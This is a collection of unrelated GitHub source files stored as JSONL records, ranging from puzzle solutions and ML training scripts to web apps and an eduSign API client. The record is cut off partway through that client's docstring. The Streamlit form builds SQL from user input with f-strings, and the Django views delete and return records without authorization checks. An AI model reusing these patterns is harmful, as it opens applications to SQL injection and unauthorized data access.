+{"seq_id":"12749441054","text":"import functools\nimport itertools\nimport re\n\nfrom sympy.core import numbers\n\nimport utils\n\n\nREVERSE_RE = r'deal into new stack'\nCUT_RE = r'cut (-?\\d+)'\nINCREMENT_RE = r'deal with increment (\\d+)'\n\n\n@functools.lru_cache(maxsize=None)\ndef inverse(n, k):\n return numbers.mod_inverse(k, n)\n\n\ndef mod(n, *coeffs):\n return tuple(coeff % n for coeff in coeffs)\n\n\nCOEFFS = {\n REVERSE_RE: lambda n, a, b: mod(n, -1 * a, -1 * b - 1),\n CUT_RE: lambda n, k, a, b: mod(n, a, b - k),\n INCREMENT_RE: lambda n, k, a, b: mod(n, a * k, b * k),\n}\n\nINV_COEFFS = {\n REVERSE_RE: lambda n, a, b: mod(n, -1 * a, -1 * b - 1),\n CUT_RE: lambda n, k, a, b: mod(n, a, b + k),\n INCREMENT_RE: lambda n, k, a, b: mod(n, a * inverse(n, k), b * inverse(n, k)),\n}\n\n\ndef get_coeffs(n, techniques, reverse=False):\n if reverse:\n techniques = techniques[::-1]\n coeff_map = INV_COEFFS\n else:\n coeff_map = COEFFS\n\n coeffs = (1, 0)\n for technique in techniques:\n for regex, method in coeff_map.items():\n match = re.match(regex, technique)\n if match:\n coeffs = method(*itertools.chain(\n [n],\n [int(arg) for arg in match.groups()],\n coeffs,\n ))\n\n return coeffs\n\n\ndef shuffle(n, card, rounds=1, reverse=False):\n techniques = utils.get_input(delimiter=None, cast=str)\n a, b = get_coeffs(n, techniques, reverse=reverse)\n return (\n pow(a, rounds, n) * card +\n b * (pow(a, rounds, n) - 1) * inverse(n, a - 1)\n ) % n\n\n\n@utils.part\ndef part_1():\n print(shuffle(10007, 2019))\n\n\n@utils.part\ndef part_2():\n print(shuffle(119315717514047, 2020, rounds=101741582076661, reverse=True))\n","repo_name":"alexander-yu/adventofcode","sub_path":"problems_2019/22.py","file_name":"22.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"5238175569","text":"from turtle import Turtle, Screen\n\ntimmy = Turtle()\ntimmy.shape('turtle')\ntimmy.color('red')\n\n#draw a square \nfor _ in range(4):\n timmy.forward(100)\n timmy.right(90)\n\n \nscreen = Screen()\nscreen.exitonclick()\n","repo_name":"kmshravani/100DaysofCode","sub_path":"Day 18/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"7112812365","text":"class Solution:\n def lengthOfLongestSubstring(self, s: str) -> int:\n if not s:\n return 0\n dp = [[0 for i in range(len(s))] for j in range(len(s))]\n for i in range(len(s)):\n dp[i][i] = 1\n max_l = 1\n for r in range(2, len(s)+1):\n for i in range(len(s)-r+1):\n j = i + r - 1\n p1,p2 = 0,0\n if dp[i][j-1] == len(s[i:j]) and s[j] not in s[i:j]:\n p1 = dp[i][j-1]+1\n if dp[i+1][j] == len(s[i+1:j+1]) and s[i] not in s[i+1:j+1]:\n p2 = dp[i+1][j] + 1\n dp[i][j] = max(p1, p2, dp[i][j-1], dp[i+1][j])\n max_l = max(max_l, dp[i][j])\n # for d in dp:\n # print(d)\n # print(max_l)\n return max_l\n\n def lengthOfLongestSubstring1(self, s: str) -> int:\n i = 0\n max_l = 0\n while i < len(s):\n j = i + 1\n index_dic = {s[i]: i}\n while j < len(s) and s[j] not in index_dic:\n index_dic[s[j]] = j\n j += 1\n max_l = max(max_l, j-i)\n if j < len(s):\n i = index_dic[s[j]]+1\n else:\n break\n return max_l\n\n def lengthOfLongestSubstring2(self, s: str) -> int:\n occ = set()\n n = len(s)\n # 右指针,初始值为 -1,相当于我们在字符串的左边界的左侧,还没有开始移动\n rk, ans = -1, 0\n for i in range(n):\n if i != 0:\n # 左指针向右移动一格,移除一个字符\n occ.remove(s[i - 1])\n while rk + 1 < n and s[rk + 1] not in occ:\n # 不断地移动右指针\n occ.add(s[rk + 1])\n rk += 1\n # 第 i 到 rk 个字符是一个极长的无重复字符子串\n ans = max(ans, rk - i + 1)\n return ans\n\n def lengthOfLongestSubstring3(self, s: str) -> int:\n i = 0\n j = 1\n max_l = 1\n index_dic = {s[0]:0}\n while i < len(s):\n while j < len(s) and s[j] not in index_dic:\n index_dic[s[j]] = j\n j += 1\n max_l = max(max_l, j-i)\n if j < len(s):\n new_i = index_dic[s[j]] + 1\n for k in range(i, new_i):\n index_dic.pop(s[k])\n i = new_i\n else:\n break\n return max_l\nif __name__ == '__main__':\n s = \"pwwkew\"\n s = \"abcabcbb\"\n a = Solution()\n a.lengthOfLongestSubstring3(s)\n\n","repo_name":"longkun-uestc/examination","sub_path":"力扣网/3-无重复字符的最长子串.py","file_name":"3-无重复字符的最长子串.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"12088384145","text":"\"\"\"Example script to train the DNC on a repeated copy task.\"\"\"\nimport os\nimport argparse\nimport logging\n\nimport torch\nfrom dnc.repeat_copy import RepeatCopy\nfrom dnc.dnc import DNC\n\n_LG = logging.getLogger(__name__)\n\n\ndef _main():\n args = _parse_args()\n logging.basicConfig(level=logging.INFO, format=\"%(asctime)s: %(message)s\")\n\n dataset = RepeatCopy(\n args.num_bits,\n args.batch_size,\n args.min_length,\n args.max_length,\n args.min_repeats,\n args.max_repeats,\n )\n\n dnc = DNC(\n access_config={\n \"memory_size\": args.memory_size,\n \"word_size\": args.word_size,\n \"num_reads\": args.num_read_heads,\n \"num_writes\": args.num_write_heads,\n },\n controller_config={\n \"input_size\": args.num_bits + 2 + args.num_read_heads * args.word_size,\n \"hidden_size\": args.hidden_size,\n },\n output_size=dataset.target_size,\n clip_value=args.clip_value,\n ).to(args.device)\n\n optimizer = torch.optim.RMSprop(dnc.parameters(), lr=args.lr, eps=args.eps)\n\n _run_train_loop(\n dnc,\n dataset,\n optimizer,\n args.num_training_iterations,\n args.report_interval,\n args.checkpoint_interval,\n args.checkpoint_dir,\n args.device,\n )\n\n\ndef _run_train_loop(\n dnc,\n dataset,\n optimizer,\n num_training,\n report_interval,\n checkpoint_interval,\n checkpoint_dir,\n device,\n):\n total_loss = 0\n for i in range(num_training):\n batch = dataset(device=device)\n state = None\n outputs = []\n for inputs in batch.observations:\n output, state = dnc(inputs, state)\n outputs.append(output)\n outputs = torch.stack(outputs, 0)\n loss = dataset.cost(outputs, batch.target, batch.mask)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n total_loss += loss.item()\n if (i + 1) % report_interval == 0:\n outputs = torch.round(batch.mask.unsqueeze(-1) * torch.sigmoid(outputs))\n dataset_string = dataset.to_human_readable(batch, outputs)\n _LG.info(f\"{i}: Avg training loss {total_loss / report_interval}\")\n _LG.info(dataset_string)\n total_loss = 0\n if checkpoint_interval is not None and (i + 1) % checkpoint_interval == 0:\n path = os.path.join(checkpoint_dir, \"model.pt\")\n torch.save(dnc.state_dict(), path)\n\n\ndef _parse_args():\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description=__doc__,\n )\n model_opts = parser.add_argument_group(\"Model Parameters\")\n model_opts.add_argument(\n \"--hidden-size\", type=int, default=64, help=\"Size of LSTM hidden layer.\"\n )\n model_opts.add_argument(\n \"--memory-size\", type=int, default=16, help=\"The number of memory slots.\"\n )\n model_opts.add_argument(\n \"--word-size\", type=int, default=16, help=\"The width of each memory slot.\"\n )\n model_opts.add_argument(\n \"--num-write-heads\", type=int, default=1, help=\"Number of memory write heads.\"\n )\n model_opts.add_argument(\n \"--num-read-heads\", type=int, default=4, help=\"Number of memory read heads.\"\n )\n model_opts.add_argument(\n \"--clip-value\",\n type=float,\n default=20,\n help=\"Maximum absolute value of controller and dnc outputs.\",\n )\n\n optim_opts = parser.add_argument_group(\"Optimizer Parameters\")\n optim_opts.add_argument(\n \"--max-grad-norm\", type=float, default=50, help=\"Gradient clipping norm limit.\"\n )\n optim_opts.add_argument(\n \"--learning-rate\",\n \"--lr\",\n type=float,\n default=1e-4,\n dest=\"lr\",\n help=\"Optimizer learning rate.\",\n )\n optim_opts.add_argument(\n \"--optimizer-epsilon\",\n type=float,\n default=1e-10,\n dest=\"eps\",\n 
help=\"Epsilon used for RMSProp optimizer.\",\n )\n\n task_opts = parser.add_argument_group(\"Task Parameters\")\n task_opts.add_argument(\n \"--batch-size\", type=int, default=16, help=\"Batch size for training\"\n )\n task_opts.add_argument(\n \"--num-bits\", type=int, default=4, help=\"Dimensionality of each vector to copy\"\n )\n task_opts.add_argument(\n \"--min-length\",\n type=int,\n default=1,\n help=\"Lower limit on number of vectors in the observation pattern to copy\",\n )\n task_opts.add_argument(\n \"--max-length\",\n type=int,\n default=2,\n help=\"Upper limit on number of vectors in the observation pattern to copy\",\n )\n task_opts.add_argument(\n \"--min-repeats\",\n type=int,\n default=1,\n help=\"Lower limit on number of copy repeats.\",\n )\n task_opts.add_argument(\n \"--max-repeats\",\n type=int,\n default=2,\n help=\"Upper limit on number of copy repeats.\",\n )\n\n train_opts = parser.add_argument_group(\"Training Options\")\n train_opts.add_argument(\n \"--device\",\n type=torch.device,\n default=\"cuda\" if torch.cuda.is_available() else \"cpu\",\n help=\"Device to perform the training.\",\n )\n train_opts.add_argument(\n \"--num-training-iterations\",\n type=int,\n default=100_000,\n help=\"Number of iterations to train for.\",\n )\n train_opts.add_argument(\n \"--report-interval\",\n type=int,\n default=100,\n help=\"Iterations between reports (samples, valid loss).\",\n )\n train_opts.add_argument(\n \"--checkpoint-dir\", default=None, help=\"Checkpointing directory.\"\n )\n train_opts.add_argument(\n \"--checkpoint-interval\",\n type=int,\n default=None,\n help=\"Checkpointing step interval.\",\n )\n args = parser.parse_args()\n\n if args.checkpoint_dir is None and args.checkpoint_interval is not None:\n raise RuntimeError(\n \"`--checkpoint-dir` is provided but `--checkpoint-interval` is not provided.\"\n )\n if args.checkpoint_dir is not None and args.checkpoint_interval is None:\n raise RuntimeError(\n \"`--checkpoint-interval` is provided but `--checkpoint-dir` is not provided.\"\n )\n return args\n\n\nif __name__ == \"__main__\":\n _main()\n","repo_name":"mthrok/dnc_pytorch","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6338,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"28698725430","text":"'''\n如何派生内置不可变类型并修改其实例化行为\n'''\n\nclass IntTuple(tuple): #跟原本的tuple是一样的\n def __init__(self,iterable):\n super(IntTuple,self).__init__(iterable)\n\n'''翻译__new__和__init__'''\nlist('abc') #下面两句等于加起来等于list('abc')\n\nl=list.__new__(list,'abc')\nlist.__init__(l,'abc')\nprint(l)\n\n'''使用__new__方法'''\nclass IntTuple(tuple):\n def __new__(cls, iterable):\n g=(x for x in iterable if isinstance(x,int) and x>0)\n # return super().__new__(cls, g)\n return super(IntTuple,cls).__new__(cls,g) #两句一样\n\nt=IntTuple([1,-1,'abc',6,['x','y'],3])\nprint(t)","repo_name":"Air-Zhuang/Test35","sub_path":"High_Level_Coding_python3/7/7_1.py","file_name":"7_1.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"25097888646","text":"import numpy as np\nimport pytest\nimport torch\nfrom jina import Document, DocumentArray\n\nfrom finetuner import __default_tag_key__\nfrom finetuner.tuner.evaluation import (\n METRICS,\n Evaluator,\n __evaluator_metrics_key__,\n __evaluator_targets_key__,\n)\n\nDATASET_SIZE = 1000\nEMBEDDING_SIZE = 10\n\n\nclass EmbeddingModel(torch.nn.Module):\n @staticmethod\n def forward(inputs):\n return inputs.repeat(1, 10)\n\n\n@pytest.fixture\ndef embed_model():\n \"\"\"The embedding model\"\"\"\n return EmbeddingModel()\n\n\n@pytest.fixture\ndef query_session_data():\n \"\"\"The query data in session format\"\"\"\n data = DocumentArray()\n for i in range(DATASET_SIZE):\n doc = Document(\n id=str(i),\n blob=np.array([i]),\n matches=[Document(id=str(DATASET_SIZE + i))],\n )\n data.append(doc)\n return data\n\n\n@pytest.fixture\ndef index_session_data():\n \"\"\"The index data in session format\"\"\"\n return DocumentArray(\n [\n Document(id=str(DATASET_SIZE + i), blob=np.array([i]))\n for i in range(DATASET_SIZE)\n ]\n )\n\n\n@pytest.fixture\ndef query_class_data():\n \"\"\"The query data in class format\"\"\"\n return DocumentArray(\n Document(id=str(i), blob=np.array([i]), tags={__default_tag_key__: str(i)})\n for i in range(DATASET_SIZE)\n )\n\n\n@pytest.fixture\ndef index_class_data():\n \"\"\"The index data in class format\"\"\"\n return DocumentArray(\n Document(\n id=str(DATASET_SIZE + i),\n blob=np.array([i]),\n tags={__default_tag_key__: str(i)},\n )\n for i in range(DATASET_SIZE)\n )\n\n\ndef test_parse_session_docs(query_session_data, index_session_data):\n \"\"\"\n Test the conversion from session docs to the internal evaluator representation\n \"\"\"\n evaluator = Evaluator(query_session_data, index_session_data)\n summarydocs = evaluator._parse_session_docs()\n for evaldoc, summarydoc in zip(query_session_data, summarydocs):\n assert evaldoc.id == summarydoc.id\n assert summarydoc.content is None\n assert evaldoc.matches[0].id in summarydoc.tags[__evaluator_targets_key__]\n assert summarydoc.tags[__evaluator_targets_key__][evaldoc.matches[0].id] == 1\n\n\ndef test_parse_class_docs(query_class_data, index_class_data):\n \"\"\"\n Test the conversion from class docs to the internal evaluator representation\n \"\"\"\n evaluator = Evaluator(query_class_data, index_class_data)\n summarydocs = evaluator._parse_class_docs()\n for evaldoc, summarydoc in zip(query_class_data, summarydocs):\n assert evaldoc.id == summarydoc.id\n assert summarydoc.content is None\n targets = list(summarydoc.tags[__evaluator_targets_key__].items())\n assert len(targets) == 1\n target, relevance = targets[0]\n assert relevance == 1\n\n\ndef test_list_available_metrics(embed_model):\n \"\"\"\n Test the listing of available metrics\n \"\"\"\n assert Evaluator.list_available_metrics() == list(METRICS.keys())\n\n\ndef test_evaluator_perfect_scores(\n embed_model,\n query_session_data,\n index_session_data,\n query_class_data,\n index_class_data,\n):\n \"\"\"\n Test the evaluator when the matching limit is set 1. 
We expect all metrics == 1.0\n    \"\"\"\n    # test both for session and class data\n    for _query_data, _index_data in [\n        (query_session_data, index_session_data),\n        (query_class_data, index_class_data),\n    ]:\n        evaluator = Evaluator(_query_data, _index_data, embed_model)\n        metrics = evaluator.evaluate(label='foo', limit=1, distance='euclidean')\n        for _, v in metrics.items():\n            assert v == 1.0\n        for doc in _query_data:\n            for _, v in doc.tags[__evaluator_metrics_key__]['foo'].items():\n                assert v == 1.0\n\n\ndef test_evaluator_half_precision(\n    embed_model,\n    query_session_data,\n    index_session_data,\n    query_class_data,\n    index_class_data,\n):\n    \"\"\"\n    Test the evaluator when the matching limit is set to 2. We expect all metrics == 1.0 except\n    precision == 0.5 and f1 score == 2/3\n    \"\"\"\n    # test both for session and class data\n    for _query_data, _index_data in [\n        (query_session_data, index_session_data),\n        (query_class_data, index_class_data),\n    ]:\n        evaluator = Evaluator(_query_data, _index_data, embed_model)\n        metrics = evaluator.evaluate(label='foo', limit=2, distance='euclidean')\n        for k, v in metrics.items():\n            if k == 'precision_at_k':\n                assert v == 0.5\n            elif k == 'f1_score_at_k':\n                assert 0.66 < v < 0.67\n            else:\n                assert v == 1.0\n        for doc in _query_data:\n            for k, v in doc.tags[__evaluator_metrics_key__]['foo'].items():\n                if k == 'precision_at_k':\n                    assert v == 0.5\n                elif k == 'f1_score_at_k':\n                    assert 0.66 < v < 0.67\n                else:\n                    assert v == 1.0\n\n\ndef test_evaluator_no_index_data(embed_model, query_class_data):\n    \"\"\"\n    Test the evaluator when no index data are given\n    \"\"\"\n    evaluator = Evaluator(query_class_data, embed_model=embed_model)\n    _ = evaluator.evaluate()\n","repo_name":"ajjurcom/finetuner","sub_path":"tests/unit/tuner/test_evaluation.py","file_name":"test_evaluation.py","file_ext":"py","file_size_in_byte":5265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"}
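The expected values in test_evaluator_half_precision follow from each query having exactly one relevant document among the two retrieved. A hypothetical check of the arithmetic, not part of the test suite:

relevant_retrieved, retrieved, relevant_total = 1, 2, 1
precision = relevant_retrieved / retrieved          # 1/2 = 0.5
recall = relevant_retrieved / relevant_total        # 1/1 = 1.0
f1 = 2 * precision * recall / (precision + recall)  # 2 * 0.5 / 1.5 = 2/3
assert abs(f1 - 2 / 3) < 1e-9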
+{"seq_id":"17036768259","text":"from flask import Flask, render_template\nfrom . import *\n\n\napp = Flask(__name__)\napp.config.from_object('config')\n\n@app.route('/')\n@app.route('/index/')\ndef index():\n return render_template('index.html')\n@app.route('/result/')\ndef result():\n description = \"\"\"\n Toi, tu n'as pas peur d'être seul ! Les grands espaces et les aventures sont faits pour toi. D'ailleurs, Koh Lanta est ton émission préférée ! Bientôt tu partiras les cheveux au vent sur ton radeau. Tu es aussi un idéaliste chevronné. Quelle chance !\n \"\"\"\n return render_template('result.html', user_name = \"eder\", user_image=url_for('static', filename='tmp/cover_111823112767411.jpg'),\n description=description, blur=True)\n\n\nif __name__ == \"__main__\":\n app.run(port=8012)","repo_name":"Nicolas-Turck/flask1","sub_path":"fbapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"14683758092","text":"from scene import *\nfrom Draw_line import my_line\nfrom sound import play_effect\n\n\npic = Texture('mou1.JPG')\nfont = ('Apple Color Emoji',25)\nclass myscene(Scene) :\n\tdef setup(self) :\n\t\tself.background_color = '#f868ff'\n\t\t\n\t\tself.pic_node = SpriteNode(pic,parent=self)\n\t\tself.pic_node.anchor_point=(0.5,0.5)\n\t\tself.pic_node.position=(self.size.w/2,self.size.h/2)\n\t\tself.pic_node.scale=0.5\n\t\t\n\t\tline,pos=my_line(100,100,300,300)\n\t\tself.lin_node = ShapeNode(line,stroke_color='#6875ff',parent=self)\n\t\tself.lin_node.position=pos\n\t\t\n\t\tself.txt_node = LabelNode('Hello,this is stan',font,parent=self)\n\t\tself.txt_node.position = (self.size.w/2,4*self.size.h/5)\n\t\tself.txt_node.color='#ff4646'\n\t\t\n\tdef touch_moved(self,touch) :\n\t\tx,y=touch.location\n\t\tself.pic_node.position=touch.location\n\t\tplay_effect('8ve:8ve-slide-network',2)\n\t\t\n\t\t\n\tdef touch_began(self,touch) :\n\t\tself.txt_node.position=touch.location\n\t\tplay_effect('digital:HighDown',0.1)\n\tdef touch_ended(self,touch) :\n\t\tself.lin_node.position=touch.location\n\t\tplay_effect('digital:HighUp',0.5)\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\nrun(myscene(),PORTRAIT,show_fps=True)\n","repo_name":"stan12138/archive","sub_path":"script/pythonista/scene_example.py","file_name":"scene_example.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"}
+{"seq_id":"73040974119","text":"import pandas as pd\nimport argparse\n\ndef main():\n df = pd.read_csv('/home/hanieh/car/bama.csv')\n m = df.value_counts([\"brand\", \"model\"])\n print(type(m))\n m.to_csv('/home/hanieh/car/counter.csv')\n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('--csv_path', type=str, help='path of csv file ', default='/home/hanieh/car/bama.csv')\n parser.add_argument('--result', type=str, help='path of result file', default='/home/hanieh/car/counter.csv')\n\n arguments = parser.parse_args()\n return arguments\n\n\nif __name__ == '__main__':\n args = parse_arguments()\n main()","repo_name":"haniehakhavan/car-detection","sub_path":"count cars.py","file_name":"count cars.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"11484920302","text":"import re\nfrom django.shortcuts import render\nfrom rest_framework.decorators import api_view\nfrom django.http import JsonResponse\n\n# Create your views here.\nfrom django.contrib.auth.models import User\nfrom rest_framework.response import Response\nfrom .serializers import user_serializer,login_serializer,docs_serializer,appointment_serializer\nfrom rest_framework import status\nfrom users.models import *\n\n@api_view(['GET'])\ndef current_users(request):\n users=User.objects.all();\n users_json=user_serializer(users,many=True);\n print(users_json)\n return Response(users_json.data)\n \n \n@api_view(['POST'])\ndef add_users(request):\n user=request.data\n print(user)\n users_json=None\n if user:\n User.objects.create(username=user['name'],email=user['email'])\n User.save\n u=User.objects.get(username=user['name'])\n users_json=user_serializer(u,many=False)\n \n \n return Response(users_json.data, status=status.HTTP_200_OK)\n\n@api_view(['POST'])\ndef login_auth(request):\n user=request.data\n login_user=User.objects.get(email=user['email'])\n print(login_user)\n if login_user:\n u=user_serializer(login_user,many=False)\n return Response(u.data,status=status.HTTP_200_OK)\n\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n\n@api_view(['GET'])\ndef getDoctors(request):\n docs=doctors.objects.all()\n docs_json=docs_serializer(docs,many=True)\n return Response(docs_json.data,status=status.HTTP_200_OK)\n\n\n@api_view(['GET'])\ndef get_appointments(request,id):\n user_appointments=appointments.objects.filter(user=id);\n json=appointment_serializer(user_appointments,many=True);\n print(json)\n return Response(json.data)\n\n@api_view(['GET'])\ndef get_appointment(request,id):\n appointment=appointments.objects.get(id=id);\n json=appointment_serializer(appointment,many=False)\n return Response(json.data)\n\n@api_view(['GET'])\ndef get_doctor(request,id):\n doctor=doctors.objects.get(id=id);\n json=docs_serializer(doctor,many=False);\n return Response(json.data)\n\n@api_view(['DELETE'])\ndef delete_appointment(request,id):\n print(id)\n appointments.objects.get(id=id).delete()\n return Response(status=status.HTTP_200_OK)\n\n@api_view(['POST'])\ndef add_appointment(request):\n data=request.data\n app=doctors.objects.get(id=data['doctor_id'])\n u=User.objects.get(id=data['user_id'])\n appointments.objects.create(user=u,doctor=app,time=data['appointment_date'])\n return Response(status=status.HTTP_200_OK)\n \n\n \n \n ","repo_name":"DeepakGonugunta/sdp4","sub_path":"djangorest/one/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"4372033058","text":"import streamlit as st\nfrom utils.utils import *\nfrom datetime import time\n\ndef create_form():\n weekdays = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday']\n avaiable_codc=list()\n for row in execute_query(conn=st.session_state[\"connection\"],\n query=\"SELECT CodC FROM Corsi;\"):\n avaiable_codc.append(row[0])\n avaiable_codf=list()\n for row in execute_query(conn=st.session_state[\"connection\"],\n query=\"SELECT CodFisc FROM Istruttore;\"):\n avaiable_codf.append(row[0])\n\n\n with st.form(\"New scheduled lesson\"):\n codf=st.selectbox(label=\"Trainer ID code selection\", options=avaiable_codf)\n cols = st.columns(5)\n with cols[0]:\n codc=st.selectbox(label=\"Course selection\", options=avaiable_codc)\n with cols[1]:\n giorno=st.selectbox(label=\"Course day selection \", options=weekdays)\n with cols[2]:\n orainizio=st.time_input(label=\"Start time selection\", step=300, value=time(hour=8))\n with cols[3]:\n durata=st.number_input(label=\"Course duration\", max_value=60, step=5, min_value=5, value=30)\n with cols[4]:\n sala=st.text_input(label=\"Room number\", max_chars=5, placeholder=\"S****\")\n \n submitted= st.form_submit_button(\"Submit\", type='primary')\n\n if submitted: \n if sala=='': \n st.warning(body=\"Insert the room number first.\")\n else:\n overlaps=execute_query(conn=st.session_state[\"connection\"], \n query=f\"SELECT STR_TO_DATE(OraInizio, '%H:%i:%s') as OraInizio, DATE_ADD(STR_TO_DATE(OraInizio, '%H:%i:%s'), INTERVAL Durata MINUTE) as OraFine FROM Programma WHERE CodC='{codc}' AND Giorno='{giorno}' ORDER BY OraInizio, Durata;\")\n flag=True\n for row in overlaps:\n if not (time_to_seconds(orainizio, durata)<=row[0].total_seconds() or time_to_seconds(orainizio,0)>=row[1].total_seconds()):\n flag=False\n\n if flag==False:\n st.error(body=\"There's at least another scheduled lesson for the same course that overlap with the selected time.\")\n else:\n execute_query(conn=st.session_state[\"connection\"],\n query=f\"INSERT INTO Programma (CodFisc, Giorno, OraInizio, Durata, Sala, CodC) VALUES ('{codf}','{giorno}','{orainizio}',{durata},'{sala}','{codc}');\")\n st.success(body=\"Insertion to database successful.\")\n\nif __name__ == \"__main__\":\n st.title(\":green[Add new scheduled lesson for a specific course]\")\n if check_connection() is not False:\n create_form()","repo_name":"erikscolaro/MySQL-streamlit_training_project","sub_path":"pages/5_Add_new_lesson.py","file_name":"5_Add_new_lesson.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"4092752056","text":"\nimport os\nimport numpy as np\n\nfrom sverchok.utils.math import inverse, inverse_square, inverse_cubic\n\ndef show_welcome():\n text = r\"\"\"\n\n ________ .___ _________\n / _____/ | | / _____/\n/ \\ ___ | | \\_____ \\ \n\\ \\_\\ \\ | | / \\ nodes for Sverchok\n \\______ / |___| /_______ /\n \\/ \\/ \n initialized.\n\n\"\"\"\n can_paint = os.name in {'posix'}\n\n with_color = \"\\033[1;31m{0}\\033[0m\" if can_paint else \"{0}\"\n for line in text.splitlines():\n print(with_color.format(line))\n\n\ndef register_class_factory_deps(classes, deps=None):\n \"\"\"\n usage\n from sverchok_gis.utils import registration_class_factory_deps\n\n classes = [SvSGNImportGeometryLine]\n register, unregister = sverchok.utils.registration_class_factory_deps(classes, deps=[gpd])\n\n \"\"\"\n import bpy\n\n if not deps:\n return bpy.utils.register_classes_factory(classes)\n\n\n def register():\n if all(deps):\n _ = [bpy.utils.register_class(c) for c in classes]\n\n def unregister():\n if all(deps):\n _ = [bpy.utils.unregister_class(c) for c in reversed(classes)]\n\n return register, unregister\n\n\n","repo_name":"Marcus-Richmond/sverchok-gis-nodes","sub_path":"utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"}
+{"seq_id":"14127415072","text":"import json\nimport uuid\nfrom pprint import pformat\nfrom urllib.parse import urljoin\n\nimport requests\nfrom flask import current_app, session, url_for\nfrom requests.auth import HTTPBasicAuth\n\nfrom edusign_webapp.utils import get_authn_context\n\n\ndef pretty_print_req(req: requests.PreparedRequest) -> str:\n \"\"\"\n Pretty print `requests.PreparedRequest`, used for logging\n\n :param req: The request to print\n :return: Pretty printed reepresentation of the request\n \"\"\"\n return '{}\\n{}\\r\\n{}\\r\\n\\r\\n{}'.format(\n '-----------START-----------',\n str(req.method) + ' ' + str(req.url),\n '\\r\\n'.join('{}: {}'.format(k, v) for k, v in req.headers.items()),\n str(req.body)[:100],\n )\n\n\nclass APIClient(object):\n \"\"\"\n Class holding methods to communicate with the Signature Service Integration REST-Service.\n\n Instances of `edusign_webapp.run.EduSignApp` Flask app has a property `api_client` that is an\n instance of this class.\n \"\"\"\n\n class ExpiredCache(Exception):\n \"\"\"\n When the client sends a document to the API to be prepared, the API will keep it\n in its cache for a configurable amount of time (15 minutes by default). Afterwards\n it will be removed.\n If the client tries to create a sign request referencing a document that has been\n removed from the cache, it will obtain an error response. So it uses this exception\n to signal such condition, to indicate that it is necessary to prepare the document\n again before trying to continue with the signing process.\n \"\"\"\n\n pass\n\n def __init__(self, config: dict):\n \"\"\"\n Initialize the client object with configuration gathered by flask.\n We need 3 parameters here:\n\n + The base URL of the signature service / API\n + The profile in the API to use - for which we have credentials (HTTP Basic Auth)\n + The HTTP Basic Auth credentials.\n\n :param config: Dict containing the configuration parameters provided to Flask.\n \"\"\"\n self.api_base_url = config['EDUSIGN_API_BASE_URL']\n self.profile = config['EDUSIGN_API_PROFILE']\n self.basic_auth = HTTPBasicAuth(config['EDUSIGN_API_USERNAME'], config['EDUSIGN_API_PASSWORD'])\n self.config = config\n\n def _post(self, url: str, request_data: dict) -> dict:\n \"\"\"\n Method to POST to the eduSign API, used by all methods of the class\n that POST to it.\n\n :param url: URL to send the POST to\n :param request_data: Dict holding the data to POST.\n :return: Flask representation of the HTTP response from the API.\n \"\"\"\n requests_session = requests.Session()\n req = requests.Request('POST', url, json=request_data, auth=self.basic_auth)\n prepped = requests_session.prepare_request(req)\n\n current_app.logger.debug(f\"Request sent to the API's {url} method: {pretty_print_req(prepped)}\")\n\n settings = requests_session.merge_environment_settings(prepped.url, {}, None, None, None)\n response = requests_session.send(prepped, **settings)\n current_app.logger.debug(f\"Response from the API's {url} method: {response}\")\n return response.json()\n\n def prepare_document(self, document: dict) -> dict:\n \"\"\"\n Send request to the `prepare` endpoint of the API.\n This API method will prepare a PDF document\n with a PDF signature page containing a visible PDF signature image,\n and keep it cached for 15min by default.\n\n The main pieces of data we have to send to this endpoint are:\n\n * pdfDocument: The PDF document as base64 data.\n\n * signaturePagePreferences.visiblePdfSignatureUserInformation.signerName.signerAttributes:\n The 
list of attributes to be used in the signature, given as `{name: }` objects.\n These are attributes released by the SAML IdP, and their name must be in uri format.\n\n * signaturePagePreferences.visiblePdfSignatureUserInformation.fieldValues.idp:\n The value of this field will appear in the signature image as the \"Authenticated by\" entity.\n We here try to provide the organization name as provided by Shibboleth, and in case it is not\n found, the entityID of the IdP chosen by the user. Note that the client (the flask app)\n will try to identify the user via seamlessaccess.org, and it will record the IdP chosen by\n the user to use it here.\n\n There are other parameters to control the insertion of the signature image in the document,\n which we've just valued as suggested in [1].\n\n The structure of the JSON to send would be something like:\n\n .. code:\n {\n \"pdfDocument\": \"JVBERi0xLj...lJUVPRgo=\",\n \"signaturePagePreferences\": {\n \"visiblePdfSignatureUserInformation\": {\n \"signerName\": 